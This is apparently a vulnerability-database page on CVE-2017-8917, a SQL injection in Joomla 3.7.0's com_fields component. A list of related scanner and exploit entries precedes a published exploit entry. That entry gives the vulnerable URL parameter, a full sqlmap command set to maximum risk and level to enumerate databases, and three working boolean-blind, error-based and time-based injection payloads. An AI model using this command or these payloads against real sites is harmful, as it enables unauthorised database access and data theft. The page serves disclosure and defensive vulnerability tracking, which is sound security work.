Joomla 3.7.0 'com_fields' SQL Injection vulnerability - May 2017, CVE-2017-8917, risks and testing on multiple platform
Reporter | Title | Published | Views | Family All 25 |
---|---|---|---|---|
Prion | Sql injection | 17 May 201723:29 | β | prion |
OpenVAS | Joomla! < 3.7.1 SQLi Vulnerability - Active Check | 18 May 201700:00 | β | openvas |
Tenable Nessus | Joomla! 3.7.x < 3.7.1 fields.php getListQuery() Method SQLi | 24 May 201700:00 | β | nessus |
Tenable Nessus | FreeBSD : Joomla3 -- SQL Injection (3c2549b3-3bed-11e7-a9f0-a4badb296695) | 19 May 201700:00 | β | nessus |
OSV | CVE-2017-8917 | 17 May 201723:29 | β | osv |
Packet Storm | Joomla 3.7.0 Fields SQL Injection | 20 May 201700:00 | β | packetstorm |
Packet Storm | Joomla Fields SQL Injection / Code Execution | 29 Mar 201800:00 | β | packetstorm |
0day.today | Joomla 3.7.0 - com_fields SQL Injection Vulnerability | 20 May 201700:00 | β | zdt |
0day.today | Joomla Fields Component - SQL Injection Remote Code Execution Exploit | 29 Mar 201800:00 | β | zdt |
exploitpack | Joomla! 3.7.0 - com_fields SQL Injection | 19 May 201700:00 | β | exploitpack |
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo